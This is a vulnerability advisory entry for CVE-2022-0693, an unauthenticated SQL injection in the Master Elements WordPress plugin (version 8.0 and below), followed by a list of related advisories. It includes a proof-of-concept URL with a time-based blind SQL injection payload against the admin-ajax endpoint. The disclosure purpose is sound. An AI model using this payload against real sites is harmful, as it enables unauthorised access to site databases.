Lucene search
CydaveWPVDB-ID:A72BF075-FD4B-4AA5-B4A4-5F62A0620643HistoryMar 29, 2022 - 12:00 a.m.
Master Elements <= 8.0 - Unauthenticated SQLi
2022-03-2900:00:00
cydave
wpscan.com
4
0.024 Low
EPSS
Percentile
89.9%
The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL Injection
PoC
As unauthenticated: https://example.com/wp-admin/admin-ajax.php?meta_ids=1)%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b&action;=remove_post_meta_condition
| CPE | Name | Operator | Version |
|---|---|---|---|
| master-elements | eq | * |
Related
cve
cve
CVE-2022-0693
2022-04-25 16:16:07
cnvd
cnvd
WordPress plugin Master Elements SQL injection vulnerability
2022-04-27 00:00:00
prion
prion
Sql injection
2022-04-25 16:16:00
nuclei
nuclei
WordPress Master Elements <=8.0 - SQL Injection
2023-03-05 13:42:10
patchstack
patchstack
cvelist
cvelist
CVE-2022-0693 Master Elements <= 8.0 - Unauthenticated SQLi
2022-04-25 15:51:06
nvd
nvd
CVE-2022-0693
2022-04-25 16:16:07
wpexploit
wpexploit
Master Elements <= 8.0 - Unauthenticated SQLi
2022-03-29 00:00:00